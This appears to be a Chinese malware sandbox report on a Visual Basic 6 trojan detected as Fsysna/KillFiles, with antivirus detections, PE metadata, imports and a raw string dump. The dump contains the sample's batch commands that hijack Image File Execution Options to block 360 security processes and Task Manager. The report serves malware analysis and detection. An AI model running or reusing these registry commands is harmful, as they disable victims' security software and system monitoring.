1.1
低危

137f17304dacf09645499b9a6bfe936c44cd93d15bf8b594fefdd57cd4c9ee66

137f17304dacf09645499b9a6bfe936c44cd93d15bf8b594fefdd57cd4c9ee66.exe

分析耗时

193s

最近分析

376天前

文件大小

450.7KB
静态报毒 动态报毒 CVE FAMILY METATYPE PLATFORM TYPE UNKNOWN WIN32 TROJAN FSYSNA
鹰眼引擎
DACN 0.12
FACILE 1.00
IMCLNet 0.69
MFGraph 0.00
静态判定
反病毒引擎
查杀引擎 查杀结果 查杀时间 查杀版本
Alibaba Worm:Win32/Fsysna.7e9c5306 20190527 0.3.0.5
Avast Win32:Malware-gen 20200108 18.4.3895.0
Baidu None 20190318 1.0.0.2
CrowdStrike win/malicious_confidence_100% (W) 20190702 1.0
Kingsoft None 20200108 2013.8.14.323
McAfee Trojan-FQXU!364E26E43888 20200108 6.0.6.653
Tencent Malware.Win32.Gencirc.10b3cff1 20200108 1.0.0.1
静态指标
行为判定
动态指标
在 PE 资源中识别到外语 (1 个事件)
name RT_VERSION language LANG_CHINESE filetype None sublanguage SUBLANG_CHINESE_SIMPLIFIED offset 0x0000a9a4 size 0x0000024c
网络通信
与未执行 DNS 查询的主机进行通信 (2 个事件)
host 114.114.114.114
host 8.8.8.8
文件已被 VirusTotal 上 64 个反病毒引擎识别为恶意 (50 out of 64 个事件)
ALYac Trojan.Agent.DVQW
APEX Malicious
AVG Win32:Malware-gen
Acronis suspicious
Ad-Aware Trojan.Agent.DVQW
AhnLab-V3 Trojan/Win32.Fsysna.R269415
Alibaba Worm:Win32/Fsysna.7e9c5306
Antiy-AVL Trojan/Win32.Fsysna.FCCR
Arcabit Trojan.Agent.DVQW
Avast Win32:Malware-gen
Avira TR/Dropper.Gen
BitDefender Trojan.Agent.DVQW
BitDefenderTheta AI:Packer.EA74E6911F
Bkav W32.HfsOval.
CAT-QuickHeal Trojan.FsysnaVMF.S7094755
ClamAV Win.Malware.Fsysna-7004456-0
Comodo TrojWare.Win32.Ditertag.DI@8k2up6
CrowdStrike win/malicious_confidence_100% (W)
Cybereason malicious.438884
Cylance Unsafe
Cyren W32/Fsysna.E.gen!Eldorado
DrWeb Trojan.KillFiles.64121
ESET-NOD32 Win32/KillFiles.A
Emsisoft Trojan.Agent.DVQW (B)
Endgame malicious (high confidence)
F-Prot W32/Fsysna.E.gen!Eldorado
F-Secure Trojan.TR/Dropper.Gen
FireEye Generic.mg.364e26e4388840b8
Fortinet W32/Fsysna.FCCR!tr
GData Trojan.Agent.DVQW
Ikarus Trojan.Agent
Invincea heuristic
Jiangmin Trojan.Fsysna.kfk
K7AntiVirus Trojan ( 0000bbc81 )
K7GW Trojan ( 0000bbc81 )
Kaspersky Trojan.Win32.Fsysna.fcpq
Lionic Trojan.Win32.Fsysna.tpPg
MAX malware (ai score=86)
Malwarebytes Hijack.AssocExt
McAfee Trojan-FQXU!364E26E43888
McAfee-GW-Edition BehavesLike.Win32.HLLPSoul.gh
MicroWorld-eScan Trojan.Agent.DVQW
Microsoft Trojan:Win32/Musecador
NANO-Antivirus Trojan.Win32.Fsysna.fpivmo
Paloalto generic.ml
Panda Trj/Genetic.gen
Qihoo-360 Win32/Harm.XiaoHao.F
Rising Worm.KillFile!1.B91B (CLASSIC)
SUPERAntiSpyware Trojan.Agent/Gen-Injector
SentinelOne DFI - Malicious PE
可视化分析
二进制图像
数据导入图像 288x288
数据导入图像 224x224
数据导入图像 192x192
数据导入图像 160x160
数据导入图像 128x128
数据导入图像 96x96
数据导入图像 64x64
数据导入图像 32x32
运行截图
暂无运行截图 该样本运行过程中未生成截图

👋 欢迎使用 ChatHawk

我是您的恶意软件分析助手,可以帮您分析和解读恶意软件报告。请随时向我提问!

🔍 主要威胁分析
⚡ 行为特征
🛡️ 防护建议
🔧 技术手段
🎯 检测方法
🤖

PE Compile Time

2019-04-20 18:22:04

PE Imphash

d2bf2bc66c5e49a85254cd29b19046bd

Sections

Name Virtual Address Virtual Size Size of Raw Data Entropy
.text 0x00001000 0x00007df0 0x00008000 6.058616924670466
.data 0x00009000 0x00000b40 0x00001000 0.0
.rsrc 0x0000a000 0x00001000 0x00001000 4.416328167746471

Resources

Name Offset Size Language Sub-language File type
RT_ICON 0x0000a0e8 0x000008a8 LANG_NEUTRAL SUBLANG_NEUTRAL None
RT_GROUP_ICON 0x0000a990 0x00000014 LANG_NEUTRAL SUBLANG_NEUTRAL None
RT_VERSION 0x0000a9a4 0x0000024c LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED None

Imports

Library MSVBVM60.DLL:
0x401000 _CIcos
0x401004 _adj_fptan
0x401008 __vbaStrI4
0x40100c __vbaVarMove
0x401010 __vbaAryMove
0x401014 __vbaFreeVar
0x401018 __vbaStrVarMove
0x40101c __vbaLenBstr
0x401020 __vbaFreeVarList
0x401024 __vbaEnd
0x401028 _adj_fdiv_m64
0x40102c __vbaFreeObjList
0x401030 _adj_fprem1
0x401034 __vbaStrCat
0x401038 __vbaError
0x40103c __vbaSetSystemError
0x401044 _adj_fdiv_m32
0x401048 __vbaAryDestruct
0x40104c __vbaExitProc
0x401050 __vbaVarForInit
0x401054 None
0x401058 None
0x40105c __vbaObjSet
0x401060 __vbaOnError
0x401064 _adj_fdiv_m16i
0x401068 _adj_fdivr_m16i
0x40106c None
0x401070 _CIsin
0x401074 __vbaErase
0x401078 __vbaChkstk
0x40107c __vbaGosubFree
0x401080 __vbaFileClose
0x401084 EVENT_SINK_AddRef
0x40108c None
0x401090 __vbaAryConstruct2
0x401094 __vbaPutOwner4
0x401098 __vbaI2I4
0x40109c DllFunctionCall
0x4010a0 __vbaFpUI1
0x4010a4 __vbaRedimPreserve
0x4010a8 __vbaStrR4
0x4010ac _adj_fpatan
0x4010b4 None
0x4010b8 __vbaRedim
0x4010bc EVENT_SINK_Release
0x4010c0 __vbaNew
0x4010c4 None
0x4010c8 __vbaUI1I2
0x4010cc _CIsqrt
0x4010d4 __vbaUI1I4
0x4010d8 __vbaExceptHandler
0x4010dc __vbaPrintFile
0x4010e0 __vbaStrToUnicode
0x4010e4 None
0x4010e8 _adj_fprem
0x4010ec _adj_fdivr_m64
0x4010f0 __vbaGosub
0x4010f4 None
0x4010f8 __vbaFPException
0x4010fc None
0x401100 __vbaGetOwner3
0x401104 __vbaStrVarVal
0x401108 __vbaVarCat
0x40110c __vbaGetOwner4
0x401110 __vbaI2Var
0x401114 __vbaLsetFixstrFree
0x401118 None
0x40111c _CIlog
0x401120 __vbaErrorOverflow
0x401124 __vbaFileOpen
0x401128 __vbaVar2Vec
0x40112c __vbaNew2
0x401130 None
0x401134 None
0x401138 None
0x40113c _adj_fdiv_m32i
0x401140 _adj_fdivr_m32i
0x401144 None
0x401148 __vbaStrCopy
0x40114c __vbaVarSetObj
0x401150 __vbaFreeStrList
0x401154 __vbaDerefAry1
0x401158 _adj_fdivr_m32
0x40115c _adj_fdiv_r
0x401160 None
0x401164 None
0x401168 __vbaVarTstNe
0x40116c None
0x401170 __vbaI4Var
0x401174 __vbaVarAdd
0x401178 __vbaAryLock
0x40117c __vbaVarDup
0x401180 __vbaStrToAnsi
0x401188 __vbaFpI4
0x40118c __vbaVarCopy
0x401190 None
0x401198 _CIatan
0x40119c __vbaStrMove
0x4011a0 __vbaStrVarCopy
0x4011a4 _allmul
0x4011a8 __vbaLenVarB
0x4011ac _CItan
0x4011b0 __vbaAryUnlock
0x4011b4 __vbaFPInt
0x4011b8 __vbaVarForNext
0x4011bc _CIexp
0x4011c0 __vbaFreeStr
0x4011c4 __vbaFreeObj

L!This program cannot be run in DOS mode.
#BBBL^B`BdBRichB
`.data
MSVBVM60.DLL
rjrbrrr
rvjrNr:
rrbr*<r}Artr
rr4ur9
r}irWr!NrwrSr+rgr
=r:r7ruBr
Vr2Cr:
rJlrr
rrar5r
r$br/Nrwr
rrpurkrmrIrr0lrF
yE81$HH
M%-:O3f
2.X By:znkzz
S!!#uR
zzzzzzzz
zzzzzzz
zzzzzzzz
zUzzyQz
zzzzzzzzz-
zzzzzzzz-
zzzzzzzzz
zzzzzzzzzzz
zzzzzzzzf
zzzzzzzG
zzzzzzzzz
zzzzzzzzzzzz
Timer2
Timer1
Label3
@echo off
reg add "hklm\software\microsoft\windows nt\currentversion\Image File Execution Options\ZhuDongFangYu.exe" /v debugger /t reg_sz /d "ntsd -d" /f
reg add "hklm\software\microsoft\windows nt\currentversion\Image File Execution Options\360tray.exe" /v debugger /t reg_sz /d "ntsd -d" /f
reg add "hklm\software\microsoft\windows nt\currentversion\Image File Execution Options\taskmgr.exe" /v debugger /t reg_sz /d "ntsd -d" /f
Label2
Label1
Label1
yE81$H
VB5!6&vb6chs.dll
zE!~@Jke
Class1
yE81$H^pqD
Label1
+3qC:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
Timer1
Timer2
Label2
Label3
user32
keybd_event
GetForegroundWindow
user32.dll
GetWindowTextA
GetWindowTextLengthA
FindWindowA
SetWindowTextA
SearchFiles
getCaption
+3q"=h
+3qhJu
+3qClass
C:\windows\SysWow64\MSVBVM60.DLL\3
RegisterA
RegisterB
RegisterC
RegisterD
Md5_String_Calc
Md5_File_Calc
GetValues
MD5Init
MD5Final
MD5Update
LongLeftRotate
__vbaVarSetObjAddref
VBA6.DLL
__vbaStrVarVal
__vbaVarCopy
__vbaStrToUnicode
__vbaStrToAnsi
__vbaSetSystemError
__vbaLsetFixstrFree
__vbaVarForNext
__vbaFpI4
__vbaFPInt
__vbaStrR4
__vbaVarLateMemCallLd
__vbaNew
__vbaVarSetObj
__vbaPutOwner4
__vbaStrVarCopy
__vbaPrintFile
__vbaI2Var
__vbaVarForInit
__vbaFileClose
__vbaGetOwner4
__vbaRedim
__vbaFileOpen
__vbaEnd
__vbaFreeObjList
__vbaNew2
__vbaVarDup
__vbaOnError
__vbaFixstrConstruct
__vbaErrorOverflow
__vbaAryDestruct
__vbaFreeVarList
__vbaAryUnlock
__vbaAryLock
__vbaFreeStrList
__vbaVarTstNe
__vbaFreeObj
__vbaHresultCheckObj
__vbaObjSet
__vbaVarMove
__vbaError
__vbaFreeStr
__vbaDerefAry1
__vbaStrCopy
__vbaI4Var
__vbaRedimPreserve
__vbaVarAdd
__vbaLenBstr
__vbaFreeVar
__vbaStrCat
__vbaStrMove
__vbaI2I4
__vbaUI1I2
__vbaAryConstruct2
__vbaFpUI1
__vbaVarCat
__vbaStrVarMove
__vbaUI1I4
__vbaVar2Vec
__vbaGosubFree
__vbaExitProc
__vbaGetOwner3
__vbaGosub
__vbaErase
__vbaLenVarB
__vbaAryMove
__vbaGenerateBoundsError
__vbaStrI4
FileType
SourceString
InFile
InputLen
InputBuffer
}}}}}}}|l\EWEPE
EPlPEPt
MJSEP.PSj
M3EPPu
lXEP@Puy0@X
XP7M)j
tSlPEP
XMfXf9X
#fXEPEPj
EPlPEPt
MSEPPSj
MEPPux
uEPEPj
SEP*L]L9E
MEPHEPEPj
MX|PEPj
} jdh<3@
hPEPEPE
} jPh3@
} jXh3@
MEPEPEPEPj
hPfEhOE
uujj E
MhPEPEPE
HP8P(PPPEP|
P|PEPEP9P
P|PDEPEPP
jj MmE
;PEP7E
PxP8PHP(PP
PPPPPPPP{PxPhPgj
EPXPJ
M9hPxPPPPPPPPP
PHP8PXPhPj
PxPx|x
} jPh3@
} jXh3@
1EPEPEPEPj
EPEPEPEPj
XPhPxPPPPPPPPP
P(P8PHPXPhPj
LSVWeE
VuEPgP3
EPHM`EUM
McM+MS
PEPDEEPE
jTh,3@
jPh,3@
EP@Pu>MDE
SVWeEP
SVWeE`
M_h6]@
SVWeEp
MKhJ^@
TSVWeE
]]]]P8;}
VPHEPEP
P$MQMQE
j@WVPM
MQVP4;}
UM]h_@
EP3S#EPS
j\XXSVWeE
PPuVj@YE
M/M'MO
HSVWeE
VEPEP}}}
EWEPEP+P
WVEPEP]E
MJEPEP
3EPEPj
4SVWeE
QV}}}}
QVPLuuB
EPEPEPEPEPEPj
EPEPEPEPEPEPj
E_EEPE
P]}u-EPEPEP"P"
MEPEPj
>EEEPE
Es^uS'EEEEPEP}u;EPEPEP0P0
MEPEPEPj
EEEEPEP}uEPEPEP
EEEEPEP}u1EPEPEP&P&
MEPEPEPj
EEEEPEP}u
EPEPEP
EEPEP}u
EPEPEP
EPEPEPj
EEPEP}unEPEPEPcPc
M)EPEPj
EPEPEPj
SVWeE0
MQMQ}}]V}~PPp
MQMQVPp
MQMQVPp
MQMQVPpFDMH
XSVWeE8
EP]]]]
EEj@_]E
jxX+MQM
MQMQVPpM
MQMQVPpE]E=
MQMQVPpE]E=
MQMQVPpE]E=
MQMEQE
VPOhl@
LSVWeEH
NPj@_e
f;EE~]
E\f;EE
VPPfEf
HSVWeEP
EEEEEEEEh9@
MQEMEQE
MQMQMQu
MQMQMQMQVExjE
MQMQMQM
QMQMQMQMQEVE
MQMQMQM
QMQMQMQMQVEp $]PXj
MQMQMQM
QMQMQMQMQVE
MQMQMQM
QMQMQMQMQVE
MQMQMQME*
QMQMQMQMQVPX
MQMQMQM
QMQMQMQMQVE
MQMQMQM
QMQMQMQMQVE
MQMQMQM
QMQMQMQMQVE
MQMQMQM
$QMQMQMQMQVPX
MQMQMQM
(QMQMQMQMQVE[]PX
MQMQMQM
,QMQMQMQMQVE\}PX
MQMQMQM
0QMQMQME"
QMQVPX
MQMQMQM
4QMQMQMQMQVEqE
MQMQMQM
8QMQMQMQMQVECy]PX
MQMQMQM
<QMQMQMQMQVE!
MQMQMQMEb%
QMQMQMQMQVP\
MQMQMQM
QMQMQMQMQVE@@E
MQMQMQM
,QMQMQMQMQVEQZ^&]P\j
MQMQMQu
MQMQMQMQVE
MQMQMQM
QMQMQMQMQVP\
MQMQMQM
(QMQMQMQMQVES
MQMQMQM
<QMQMQMQMQVE
MQMQMQM
QMQMQE}MQMQVP\
MQMQMQM
$QMQMQMQMQVE!E
MQMQMQM
8QMQMQMQMQVE
MQMQMQM
QMQMQMQMQVE
MQMQMQME
ZE} QMQMQMQMQVP\
MQMQMQM
4QMQMQMQMQVE
MQMQMQM
QMQMQMQMQVEE
MQMQMQM
QMQMQMQMQVE
EL*}MQMQMQM
0QMQMQMQMQVP\j
MQMQMQM
QMQMQMQMQVEB9]P`
MQMQMQM
QMQMQMQMQVEqE
_MQMQMQM
,QME"am}QMQMQMQVP`
MQMQMQM
8QMQMQMQMQVE
MQMQMQM
QMQMQMQMQVED
MQMQMQM
QMQMQMQMQVEKE
MQME`K}QMQM
QMQMQMQMQVP`
MQMQMQM
(QMQMQMQMQVEpE
MQMQMQM
4QMQMQMQMQVE~(]P`
MQMQMQu
MQMQMQMQVE'E
MQMQMQM
QMQMQMQMQVP`
MQMQMQM
QMQMQMQMQVE
MQMQMQM
$QMQMQMQMQVE9
MQMQMQM
0QMQMQEE
MQMQVP`
MQMQMQM
<QMQMQMQMQVE|}P`
MQMQMQM
QMQMQMQMQVEeVE
MQMQMQu
MQMQMQMQVED")E
MQMQMQM
QMQMQMQMQVPd
MQMQMQM
8QMQMQMQMQVE#E
MQMQMQM
QMQMQMQMQVE9E
MQMQMQM
0QMQMQMQMQVEY[eE
QMQMQM
QMQMQMQMQVPd
MQMQMQM
(QMQMQMQMQVE}E
MQMQMQM
QMQMQMQMQVE]E
MQMQMQM
QMQMQMQMEO~oE
MQMQMQM
<QMQMQMQMQVE,E
MQMQMQM
QMQMQMQMQVE
MQMQMQM
4QMQMQMQMQVE
MQMQMQM
MQMQMQMQVPd
MQMQMQM
,QMQMQMQMQVE5:E
MQMQMQM
QMQMQMQMQVE*E
MQMQMQM
$QMQMQMQMQVE
MQMQND
QVPhFDMH
MQMQND
QVPhFDMH
MQMQND
QVPhFDMH
MQMQND
QVPhFDMH
S3Wf8f
f;]]]]
QWVPlEM
QWVPlEM
QWVPlEM
QWVPlEM
SVWeE`
V3EEEE
MSVBVM60.DLL
_CIcos
_adj_fptan
__vbaStrI4
__vbaVarMove
__vbaAryMove
__vbaFreeVar
__vbaStrVarMove
__vbaLenBstr
__vbaFreeVarList
__vbaEnd
_adj_fdiv_m64
__vbaFreeObjList
_adj_fprem1
__vbaStrCat
__vbaError
__vbaSetSystemError
__vbaHresultCheckObj
_adj_fdiv_m32
__vbaAryDestruct
__vbaExitProc
__vbaVarForInit
__vbaObjSet
__vbaOnError
_adj_fdiv_m16i
_adj_fdivr_m16i
_CIsin
__vbaErase
__vbaChkstk
__vbaGosubFree
__vbaFileClose
EVENT_SINK_AddRef
__vbaGenerateBoundsError
__vbaAryConstruct2
__vbaPutOwner4
__vbaI2I4
DllFunctionCall
__vbaFpUI1
__vbaRedimPreserve
__vbaStrR4
_adj_fpatan
__vbaFixstrConstruct
__vbaRedim
EVENT_SINK_Release
__vbaNew
__vbaUI1I2
_CIsqrt
EVENT_SINK_QueryInterface
__vbaUI1I4
__vbaExceptHandler
__vbaPrintFile
__vbaStrToUnicode
_adj_fprem
_adj_fdivr_m64
__vbaGosub
__vbaFPException
__vbaGetOwner3
__vbaStrVarVal
__vbaVarCat
__vbaGetOwner4
__vbaI2Var
__vbaLsetFixstrFree
_CIlog
__vbaErrorOverflow
__vbaFileOpen
__vbaVar2Vec
__vbaNew2
_adj_fdiv_m32i
_adj_fdivr_m32i
__vbaStrCopy
__vbaVarSetObj
__vbaFreeStrList
__vbaDerefAry1
_adj_fdivr_m32
_adj_fdiv_r
__vbaVarTstNe
__vbaI4Var
__vbaVarAdd
__vbaAryLock
__vbaVarDup
__vbaStrToAnsi
__vbaVarLateMemCallLd
__vbaFpI4
__vbaVarCopy
__vbaVarSetObjAddref
_CIatan
__vbaStrMove
__vbaStrVarCopy
_allmul
__vbaLenVarB
_CItan
__vbaAryUnlock
__vbaFPInt
__vbaVarForNext
_CIexp
__vbaFreeStr
__vbaFreeObj
S!!#uR
zzzzzzzz
zzzzzzz
zzzzzzzz
zUzzyQz
zzzzzzzzz-
zzzzzzzz-
zzzzzzzzz
zzzzzzzzzzz
zzzzzzzzf
zzzzzzzG
zzzzzzzzz
zzzzzzzzzzzz
C:\Users\Administrator\Desktop\
2.X.pdb
49431AAD794634219A639C6C541A3D96
E8A7EA76E1854769DE340A9B8C435D05
78493ED5434848C66C6270A8C3C17E8F
96782471E1F42F0E5192DEF8D34ADF52
62A15B7205C4F5C57A85B0D3069C33A9
9FFC7CA89A523E8929336726D7773437
D3436C5275093FAF2564D1686B09A90D
E3338793698E1606AF47D324D912D726
EC9586D14581D3BBA0F9E75718021738
7922F4DB6BD4AF02B061CB04F35BE848
L!This program cannot be run in DOS mode.
#BBBL^B`BdBRichB
`.data
MSVBVM60.DLL
rjrbrrr
rvjrNr:
rrbr*<r}Artr
rr4ur9
r}irWr!NrwrSr+rgr
=r:r7ruBr
Vr2Cr:
rJlrr
rrar5r
r$br/Nrwr
rrpurkrmrIrr0lrF
yE81$HH
M%-:O3f
2.X By:znkzz
S!!#uR
zzzzzzzz
zzzzzzz
zzzzzzzz
zUzzyQz
zzzzzzzzz-
zzzzzzzz-
zzzzzzzzz
zzzzzzzzzzz
zzzzzzzzf
zzzzzzzG
zzzzzzzzz
zzzzzzzzzzzz
Timer2
Timer1
Label3
@echo off
reg add "hklm\software\microsoft\windows nt\currentversion\Image File Execution Options\ZhuDongFangYu.exe" /v debugger /t reg_sz /d "ntsd -d" /f
reg add "hklm\software\microsoft\windows nt\currentversion\Image File Execution Options\360tray.exe" /v debugger /t reg_sz /d "ntsd -d" /f
reg add "hklm\software\microsoft\windows nt\currentversion\Image File Execution Options\taskmgr.exe" /v debugger /t reg_sz /d "ntsd -d" /f
Label2
Label1
Label1
yE81$H
VB5!6&vb6chs.dll
zE!~@Jke
Class1
yE81$H^pqD
Label1
+3qC:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
Timer1
Timer2
Label2
Label3
user32
keybd_event
GetForegroundWindow
user32.dll
GetWindowTextA
GetWindowTextLengthA
FindWindowA
SetWindowTextA
SearchFiles
getCaption
+3q"=h
+3qhJu
+3qClass
C:\windows\SysWow64\MSVBVM60.DLL\3
RegisterA
RegisterB
RegisterC
RegisterD
Md5_String_Calc
Md5_File_Calc
GetValues
MD5Init
MD5Final
MD5Update
LongLeftRotate
__vbaVarSetObjAddref
VBA6.DLL
__vbaStrVarVal
__vbaVarCopy
__vbaStrToUnicode
__vbaStrToAnsi
__vbaSetSystemError
__vbaLsetFixstrFree
__vbaVarForNext
__vbaFpI4
__vbaFPInt
__vbaStrR4
__vbaVarLateMemCallLd
__vbaNew
__vbaVarSetObj
__vbaPutOwner4
__vbaStrVarCopy
__vbaPrintFile
__vbaI2Var
__vbaVarForInit
__vbaFileClose
__vbaGetOwner4
__vbaRedim
__vbaFileOpen
__vbaEnd
__vbaFreeObjList
__vbaNew2
__vbaVarDup
__vbaOnError
__vbaFixstrConstruct
__vbaErrorOverflow
__vbaAryDestruct
__vbaFreeVarList
__vbaAryUnlock
__vbaAryLock
__vbaFreeStrList
__vbaVarTstNe
__vbaFreeObj
__vbaHresultCheckObj
__vbaObjSet
__vbaVarMove
__vbaError
__vbaFreeStr
__vbaDerefAry1
__vbaStrCopy
__vbaI4Var
__vbaRedimPreserve
__vbaVarAdd
__vbaLenBstr
__vbaFreeVar
__vbaStrCat
__vbaStrMove
__vbaI2I4
__vbaUI1I2
__vbaAryConstruct2
__vbaFpUI1
__vbaVarCat
__vbaStrVarMove
__vbaUI1I4
__vbaVar2Vec
__vbaGosubFree
__vbaExitProc
__vbaGetOwner3
__vbaGosub
__vbaErase
__vbaLenVarB
__vbaAryMove
__vbaGenerateBoundsError
__vbaStrI4
FileType
SourceString
InFile
InputLen
InputBuffer
}}}}}}}|l\EWEPE
EPlPEPt
MJSEP.PSj
M3EPPu
lXEP@Puy0@X
XP7M)j
tSlPEP
XMfXf9X
#fXEPEPj
EPlPEPt
MSEPPSj
MEPPux
uEPEPj
SEP*L]L9E
MEPHEPEPj
MX|PEPj
} jdh<3@
hPEPEPE
} jPh3@
} jXh3@
MEPEPEPEPj
hPfEhOE
uujj E
MhPEPEPE
HP8P(PPPEP|
P|PEPEP9P
P|PDEPEPP
jj MmE
;PEP7E
PxP8PHP(PP
PPPPPPPP{PxPhPgj
EPXPJ
M9hPxPPPPPPPPP
PHP8PXPhPj
PxPx|x
} jPh3@
} jXh3@
1EPEPEPEPj
EPEPEPEPj
XPhPxPPPPPPPPP
P(P8PHPXPhPj
LSVWeE
VuEPgP3
EPHM`EUM
McM+MS
PEPDEEPE
jTh,3@
jPh,3@
EP@Pu>MDE
SVWeEP
SVWeE`
M_h6]@
SVWeEp
MKhJ^@
TSVWeE
]]]]P8;}
VPHEPEP
P$MQMQE
j@WVPM
MQVP4;}
UM]h_@
EP3S#EPS
j\XXSVWeE
PPuVj@YE
M/M'MO
HSVWeE
VEPEP}}}
EWEPEP+P
WVEPEP]E
MJEPEP
3EPEPj
4SVWeE
QV}}}}
QVPLuuB
EPEPEPEPEPEPj
EPEPEPEPEPEPj
E_EEPE
P]}u-EPEPEP"P"
MEPEPj
>EEEPE
Es^uS'EEEEPEP}u;EPEPEP0P0
MEPEPEPj
EEEEPEP}uEPEPEP
EEEEPEP}u1EPEPEP&P&
MEPEPEPj
EEEEPEP}u
EPEPEP
EEPEP}u
EPEPEP
EPEPEPj
EEPEP}unEPEPEPcPc
M)EPEPj
EPEPEPj
SVWeE0
MQMQ}}]V}~PPp
MQMQVPp
MQMQVPp
MQMQVPpFDMH
XSVWeE8
EP]]]]
EEj@_]E
jxX+MQM
MQMQVPpM
MQMQVPpE]E=
MQMQVPpE]E=
MQMQVPpE]E=
MQMEQE
VPOhl@
LSVWeEH
NPj@_e
f;EE~]
E\f;EE
VPPfEf
HSVWeEP
EEEEEEEEh9@
MQEMEQE
MQMQMQu
MQMQMQMQVExjE
MQMQMQM
QMQMQMQMQEVE
MQMQMQM
QMQMQMQMQVEp $]PXj
MQMQMQM
QMQMQMQMQVE
MQMQMQM
QMQMQMQMQVE
MQMQMQME*
QMQMQMQMQVPX
MQMQMQM
QMQMQMQMQVE
MQMQMQM
QMQMQMQMQVE
MQMQMQM
QMQMQMQMQVE
MQMQMQM
$QMQMQMQMQVPX
MQMQMQM
(QMQMQMQMQVE[]PX
MQMQMQM
,QMQMQMQMQVE\}PX
MQMQMQM
0QMQMQME"
QMQVPX
MQMQMQM
4QMQMQMQMQVEqE
MQMQMQM
8QMQMQMQMQVECy]PX
MQMQMQM
<QMQMQMQMQVE!
MQMQMQMEb%
QMQMQMQMQVP\
MQMQMQM
QMQMQMQMQVE@@E
MQMQMQM
,QMQMQMQMQVEQZ^&]P\j
MQMQMQu
MQMQMQMQVE
MQMQMQM
QMQMQMQMQVP\
MQMQMQM
(QMQMQMQMQVES
MQMQMQM
<QMQMQMQMQVE
MQMQMQM
QMQMQE}MQMQVP\
MQMQMQM
$QMQMQMQMQVE!E
MQMQMQM
8QMQMQMQMQVE
MQMQMQM
QMQMQMQMQVE
MQMQMQME
ZE} QMQMQMQMQVP\
MQMQMQM
4QMQMQMQMQVE
MQMQMQM
QMQMQMQMQVEE
MQMQMQM
QMQMQMQMQVE
EL*}MQMQMQM
0QMQMQMQMQVP\j
MQMQMQM
QMQMQMQMQVEB9]P`
MQMQMQM
QMQMQMQMQVEqE
_MQMQMQM
,QME"am}QMQMQMQVP`
MQMQMQM
8QMQMQMQMQVE
MQMQMQM
QMQMQMQMQVED
MQMQMQM
QMQMQMQMQVEKE
MQME`K}QMQM
QMQMQMQMQVP`
MQMQMQM
(QMQMQMQMQVEpE
MQMQMQM
4QMQMQMQMQVE~(]P`
MQMQMQu
MQMQMQMQVE'E
MQMQMQM
QMQMQMQMQVP`
MQMQMQM
QMQMQMQMQVE
MQMQMQM
$QMQMQMQMQVE9
MQMQMQM
0QMQMQEE
MQMQVP`
MQMQMQM
<QMQMQMQMQVE|}P`
MQMQMQM
QMQMQMQMQVEeVE
MQMQMQu
MQMQMQMQVED")E
MQMQMQM
QMQMQMQMQVPd
MQMQMQM
8QMQMQMQMQVE#E
MQMQMQM
QMQMQMQMQVE9E
MQMQMQM
0QMQMQMQMQVEY[eE
QMQMQM
QMQMQMQMQVPd
MQMQMQM
(QMQMQMQMQVE}E
MQMQMQM
QMQMQMQMQVE]E
MQMQMQM
QMQMQMQMEO~oE
MQMQMQM
<QMQMQMQMQVE,E
MQMQMQM
QMQMQMQMQVE
MQMQMQM
4QMQMQMQMQVE
MQMQMQM
MQMQMQMQVPd
MQMQMQM
,QMQMQMQMQVE5:E
MQMQMQM
QMQMQMQMQVE*E
MQMQMQM
$QMQMQMQMQVE
MQMQND
QVPhFDMH
MQMQND
QVPhFDMH
MQMQND
QVPhFDMH
MQMQND
QVPhFDMH
S3Wf8f
f;]]]]
QWVPlEM
QWVPlEM
QWVPlEM
QWVPlEM
SVWeE`
V3EEEE
MSVBVM60.DLL
_CIcos
_adj_fptan
__vbaStrI4
__vbaVarMove
__vbaAryMove
__vbaFreeVar
__vbaStrVarMove
__vbaLenBstr
__vbaFreeVarList
__vbaEnd
_adj_fdiv_m64
__vbaFreeObjList
_adj_fprem1
__vbaStrCat
__vbaError
__vbaSetSystemError
__vbaHresultCheckObj
_adj_fdiv_m32
__vbaAryDestruct
__vbaExitProc
__vbaVarForInit
__vbaObjSet
__vbaOnError
_adj_fdiv_m16i
_adj_fdivr_m16i
_CIsin
__vbaErase
__vbaChkstk
__vbaGosubFree
__vbaFileClose
EVENT_SINK_AddRef
__vbaGenerateBoundsError
__vbaAryConstruct2
__vbaPutOwner4
__vbaI2I4
DllFunctionCall
__vbaFpUI1
__vbaRedimPreserve
__vbaStrR4
_adj_fpatan
__vbaFixstrConstruct
__vbaRedim
EVENT_SINK_Release
__vbaNew
__vbaUI1I2
_CIsqrt
EVENT_SINK_QueryInterface
__vbaUI1I4
__vbaExceptHandler
__vbaPrintFile
__vbaStrToUnicode
_adj_fprem
_adj_fdivr_m64
__vbaGosub
__vbaFPException
__vbaGetOwner3
__vbaStrVarVal
__vbaVarCat
__vbaGetOwner4
__vbaI2Var
__vbaLsetFixstrFree
_CIlog
__vbaErrorOverflow
__vbaFileOpen
__vbaVar2Vec
__vbaNew2
_adj_fdiv_m32i
_adj_fdivr_m32i
__vbaStrCopy
__vbaVarSetObj
__vbaFreeStrList
__vbaDerefAry1
_adj_fdivr_m32
_adj_fdiv_r
__vbaVarTstNe
__vbaI4Var
__vbaVarAdd
__vbaAryLock
__vbaVarDup
__vbaStrToAnsi
__vbaVarLateMemCallLd
__vbaFpI4
__vbaVarCopy
__vbaVarSetObjAddref
_CIatan
__vbaStrMove
__vbaStrVarCopy
_allmul
__vbaLenVarB
_CItan
__vbaAryUnlock
__vbaFPInt
__vbaVarForNext
_CIexp
__vbaFreeStr
__vbaFreeObj
S!!#uR
zzzzzzzz
zzzzzzz
zzzzzzzz
zUzzyQz
zzzzzzzzz-
zzzzzzzz-
zzzzzzzzz
zzzzzzzzzzz
zzzzzzzzf
zzzzzzzG
zzzzzzzzz
zzzzzzzzzzzz
C:\Users\Administrator\Desktop\
2.X.pdb
49431AAD794634219A639C6C541A3D96
E8A7EA76E1854769DE340A9B8C435D05
78493ED5434848C66C6270A8C3C17E8F
96782471E1F42F0E5192DEF8D34ADF52
62A15B7205C4F5C57A85B0D3069C33A9
9FFC7CA89A523E8929336726D7773437
D3436C5275093FAF2564D1686B09A90D
E3338793698E1606AF47D324D912D726
EC9586D14581D3BBA0F9E75718021738
764B151C355885023EAC63AD4EC72A66
A7A45284C021949FCB12F82E84ADE835
E0C667944D08611BAC6BD60DA4B4BB0F
3308E37EB65C4607B66E6EEB5889FFDF
E5D714EB8CEEB6F7B4E5FD24529AD735
104EC85D1E0D2CD742D62377C0EBA714
